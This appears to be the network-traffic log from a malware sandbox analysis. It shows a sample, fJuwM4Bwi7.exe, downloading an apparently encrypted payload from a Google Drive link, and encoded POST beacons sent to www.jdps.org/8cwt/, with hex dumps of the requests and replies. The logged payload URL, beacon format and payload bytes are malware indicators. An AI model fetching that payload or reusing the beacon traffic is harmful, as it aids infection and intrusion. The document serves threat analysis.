                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:23:17.376760960 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                      Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                      Jun 4, 2024 14:23:17.376822948 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 6a 64 70 73 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 54 68 69
                                      Data Ascii: <h1>jdps.org is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"
                                      Jun 4, 2024 14:23:17.376856089 CEST1289INData Raw: 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37
                                      Data Ascii: 79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,
                                      Jun 4, 2024 14:23:17.376878977 CEST1289INData Raw: 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39
                                      Data Ascii: .83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814
                                      Jun 4, 2024 14:23:17.376913071 CEST1289INData Raw: 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36 31 36 2c 31 2e 32 34 36 31
                                      Data Ascii: 2.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,
                                      Jun 4, 2024 14:23:17.376934052 CEST1289INData Raw: 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31 32 2e 38 32 30 33 36 2c 32
                                      Data Ascii: 1,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,
                                      Jun 4, 2024 14:23:17.376955032 CEST1289INData Raw: 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e 39 37 37 37 32 63 2d 31 31
                                      Data Ascii: 52.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="
                                      Jun 4, 2024 14:23:17.376985073 CEST1289INData Raw: 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35
                                      Data Ascii: 63-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17
                                      Jun 4, 2024 14:23:17.377007961 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      71192.168.11.304992034.232.203.7080
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:23:19.898196936 CEST694OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.jdps.org
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.jdps.org
                                      Referer: http://www.jdps.org/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 78 64 48 75 35 66 43 2f 38 75 45 7a 48 68 2f 63 32 62 4b 5a 4a 72 57 71 30 6f 75 36 6b 34 59 52 6e 4b 77 61 6e 41 2b 6c 34 2b 69 66 44 6d 6e 6e 53 31 75 34 53 6a 37 66 4c 33 62 67 68 31 50 66 4c 4b 50 73 51 50 47 58 6d 66 37 39 41 6b 30 67 62 52 61 59 7a 67 57 36 65 6f 6c 33 71 55 30 52 2b 4b 48 4a 76 56 4b 50 58 43 48 77 6e 6f 76 4f 75 48 6d 78 43 65 53 4d 49 7a 4e 6b 76 70 73 48 49 59 38 67 44 46 30 36 54 36 74 6e 74 4b 39 48 45 4c 51 59 6c 73 35 38 4c 72 73 62 58 35 61 63 2b 61 55 43 56 52 61 39 77 75 30 32 78 58 2b 77 2b 57 6f 30 68 66 41 47 51 73 4f 47 39 42 6c 39 55 62 74 50 6f 75 70 7a 74 6b 70 76 5a 36 2b 41 53 42 32 76 4a 4b 51 3d
                                      Data Ascii: 24eluX=xdHu5fC/8uEzHh/c2bKZJrWq0ou6k4YRnKwanA+l4+ifDmnnS1u4Sj7fL3bgh1PfLKPsQPGXmf79Ak0gbRaYzgW6eol3qU0R+KHJvVKPXCHwnovOuHmxCeSMIzNkvpsHIY8gDF06T6tntK9HELQYls58LrsbX5ac+aUCVRa9wu02xX+w+Wo0hfAGQsOG9Bl9UbtPoupztkpvZ6+ASB2vJKQ=
                                      Jun 4, 2024 14:23:20.031656027 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:23:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:23:20.031694889 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                      Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                      Jun 4, 2024 14:23:20.031754971 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 6a 64 70 73 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 54 68 69
                                      Data Ascii: <h1>jdps.org is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"
                                      Jun 4, 2024 14:23:20.031815052 CEST1289INData Raw: 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37
                                      Data Ascii: 79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,
                                      Jun 4, 2024 14:23:20.031835079 CEST1289INData Raw: 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39
                                      Data Ascii: .83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814
                                      Jun 4, 2024 14:23:20.031853914 CEST1289INData Raw: 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36 31 36 2c 31 2e 32 34 36 31
                                      Data Ascii: 2.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,
                                      Jun 4, 2024 14:23:20.031873941 CEST1289INData Raw: 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31 32 2e 38 32 30 33 36 2c 32
                                      Data Ascii: 1,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,
                                      Jun 4, 2024 14:23:20.031894922 CEST1289INData Raw: 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e 39 37 37 37 32 63 2d 31 31
                                      Data Ascii: 52.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="
                                      Jun 4, 2024 14:23:20.031914949 CEST1289INData Raw: 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35
                                      Data Ascii: 63-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17
                                      Jun 4, 2024 14:23:20.031936884 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.11.3049842142.250.217.1744433344C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      TimestampBytes transferredDirectionData
                                      2024-06-04 12:14:44 UTC216OUTGET /uc?export=download&id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2024-06-04 12:14:45 UTC1582INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 04 Jun 2024 12:14:44 GMT
                                      Location: https://drive.usercontent.google.com/download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: script-src 'nonce-YeRv5Plf8HFHjGMuZHFaCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.11.3049843172.217.215.1324433344C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      TimestampBytes transferredDirectionData
                                      2024-06-04 12:14:45 UTC258OUTGET /download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      2024-06-04 12:14:46 UTC4802INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Content-Security-Policy: sandbox
                                      Content-Security-Policy: default-src 'none'
                                      Content-Security-Policy: frame-ancestors 'none'
                                      X-Content-Security-Policy: sandbox
                                      Cross-Origin-Opener-Policy: same-origin
                                      Cross-Origin-Embedder-Policy: require-corp
                                      Cross-Origin-Resource-Policy: same-site
                                      X-Content-Type-Options: nosniff
                                      Content-Disposition: attachment; filename="yWAFO148.bin"
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Dom [TRUNCATED]
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 270400
                                      Last-Modified: Mon, 27 May 2024 11:27:50 GMT
                                      X-GUploader-UploadID: ABPtcPpKIQPT8prEKCKSemSaXDXygpXMLqOxd53KkaAagm_Ol6oemj7EQTwRi_-Dwr39fKcisKg
                                      Date: Tue, 04 Jun 2024 12:14:46 GMT
                                      Expires: Tue, 04 Jun 2024 12:14:46 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=Cquxjg==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-06-04 12:14:46 UTC4802INData Raw: ae c2 40 a0 a8 4d b5 21 1b 6e 6a a7 81 34 f6 f3 3f 7e a4 b3 2e ec 94 22 cc 5d c1 b6 e7 da 5e 17 75 bb fd 59 eb 7e 82 9c 9e ec 25 aa d2 9b 0f 9c b2 2c 16 47 63 8c 47 2b 5a 49 81 de b0 95 d6 d2 de 16 72 61 5f f8 d8 ba 19 69 d6 71 6e f5 8f 0e d7 1a 3e 44 2b c7 9e 7a cc a7 e1 a7 77 64 1f 17 88 72 0f 79 43 d4 f9 39 a6 fe 73 87 f4 ff 75 14 7e 8a 43 6d 82 91 15 91 f2 24 2d e0 cf de 6e cf d6 79 48 04 05 9f 1b e8 71 79 cc 06 ed ac ff ab 00 bd 5f 4e da 46 e1 09 b6 4f 5a 35 3c c8 4f 0a d4 4c f6 0f 95 28 67 c9 df 5b 83 47 aa ce d6 9e da 1e 5b a2 5b 34 21 e7 53 4c 73 b5 56 45 d7 16 93 37 f9 e8 5b 75 6c 47 ca bf 90 a0 0d 95 ac 0b 21 9a a7 b1 24 0d 80 be 01 f5 a4 d8 b7 03 0a 4e 54 38 47 af 03 99 3f 46 92 35 dc 92 2e 68 0c b3 cd b6 72 73 8e 84 c2 f1 ac ac 0b 8c ed e3 d5
                                      Data Ascii: @M!nj4?~."]^uY~%,GcG+ZIra_iqn>D+zwdryC9su~Cm$-nyHqy_NFOZ5<OL(g[G[[4!SLsVE7[ulG!$NT8G?F5.hrs
                                      2024-06-04 12:14:46 UTC4802INData Raw: 2b 2d c2 9b 2b c2 43 1b 89 78 0f 98 1b 84 fc 5c 63 31 ff 08 57 f8 e8 29 e7 09 27 8a 0b 9c 0e fb 5d cb d4 3c 51 12 62 c9 2f a8 18 a9 a3 45 15 b0 60 00 be 75 df 13 d9 19 a8 9f d3 5f 39 42 fb a7 c7 68 fd da 91 fe ee 15 0a 9a 7f 3c e6 3e e0 a6 3a 43 b6 d3 2c f2 dd fc d6 e0 9d e2 2e 51 87 bc a4 6c 98 72 6f 4c de 44 f7 9c 1f 74 9e cf 5c ba b9 7e 3d de 12 ae c2 ca 32 c9 64 37 43 6e 4d 88 75 ca c0 8e b4 4c ad 42 5e f6 45 7d f3 31 9a a9 c1 f9 b5 42 54 bd 32 7c da ef 19 e9 5b 12 dd 6a 24 1b 57 ab 88 3d 1c c8 e0 b2 a5 5a 46 38 de 08 a5 a2 d7 e5 bd 58 1b 29 e9 74 27 09 d1 e3 95 80 bb 02 93 39 69 b8 fa f4 d7 ed d9 57 5a 4f 22 98 21 82 c1 63 6b 83 6d d2 43 a3 04 07 2e 1d 4e 3f 9c 5a 73 81 00 07 06 00 9f 36 70 ff 15 40 b1 23 b4 14 8d 85 3d 28 5e f7 1a 47 b3 2c de ef 09
                                      Data Ascii: +-+Cx\c1W)']<Qb/E`u_9Bh<>:C,.QlroLDt\~=2d7CnMuLB^E}1BT2|[j$W=ZF8X)t'9iWZO"!ckmC.N?Zs6p@#=(^G,
                                      2024-06-04 12:14:46 UTC291INData Raw: d8 b5 45 e2 14 06 0a d6 2a 14 93 0d f9 41 76 0a 69 03 fd 15 89 44 96 77 2d 69 e8 f9 71 77 4f 35 4e d0 62 20 ae 21 8d a5 ba c1 d6 ae 3b 40 30 14 94 3f 03 2b 15 e3 5a 02 2e 5f 74 a3 7b 53 f1 00 19 33 eb 56 81 4d 81 6e b3 92 2b 9c 07 87 ad 9c fb 2a 5d 7e fe 50 4c 9e b5 00 bb f5 fa f4 45 da ac 9c a3 3c cd f5 7c 97 23 55 31 e8 e8 c0 e9 c0 e6 79 3b 7b 76 0d ea 4a 4d d9 ef 0f f1 4b d8 09 d6 03 fe 89 58 5f b9 80 49 82 8d f3 75 1a fb ba 7b 69 04 77 d5 bc 44 14 64 56 82 c3 38 89 f9 e9 5d b7 04 18 9f cb b1 71 a3 33 2a 23 62 51 c5 b9 2e 85 02 84 bc 02 bd fa c3 7f 13 b8 09 2a d4 f8 73 17 54 4c 73 0d 9a 5f ed c6 cb d8 d9 b7 24 ff 8b 41 73 8e 77 9a 15 b8 a8 0a 5d 34 14 e2 2c 5f 41 c9 a5 af 60 8c 75 d0 16 bc cb 3d 13 a0 9f 0a 98 97 19 f8 a7 28 a9 0f 97 6b 86 22 ed 48 50
                                      Data Ascii: E*AviDw-iqwO5Nb !;@0?+Z._t{S3VMn+*]~PLE<|#U1y;{vJMKX_Iu{iwDdV8]q3*#bQ.*sTLs_$Asw]4,_A`u=(k"HP
